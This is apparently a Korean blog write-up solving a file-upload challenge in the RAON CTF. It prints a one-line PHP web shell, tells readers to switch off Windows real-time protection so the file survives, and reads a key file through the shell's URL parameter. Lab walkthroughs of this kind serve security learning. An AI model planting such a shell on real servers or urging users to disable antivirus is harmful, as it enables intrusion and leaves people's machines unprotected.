#13 RAON CTF 문제 풀이-4 (File Upload)

#01 File Upload
1. Level 1: 파일 업로드 서비스를 이용하여 Key.php 파일 안에 존재하는 패스워드를 확보하세요

문제 사이트를 열면 이런 화면을 볼 수 있다.
파일을 선택하여 업로드할 수 있다.
 
 

<?php
system($_GET['x']);
?>

위와 같은 내용을 포함한 a.php 파일을 임의로 만들어줬다.
(윈도우 10 보안 시스템이 악성 파일로 인지하여 자꾸 삭제하기 때문에 [Windows 보안] - [바이러스 및 위협 방지 설정] - [실시간 보호 해제] 설정해줘야 한다!)
 
 

해당 파일을 선택하여 '파일 전송' 버튼을 누르면
 
 

위와 같은 창이 뜬다.
./uploads/a.php 경로에 업로드 된 것을 알 수 있다.
 
 
원래 URL 뒤에 /uploads/a.php?x=cat%20../Key.php을 입력해주면 (https://~~~.raonctf.com/uploads/a.php?x=cat%20../Key.php)
 
 

빈 사이트가 뜨고, 우클릭하여 '페이지 원본 보기'를 누르면
 
 

플래그 값을 확인할 수 있다.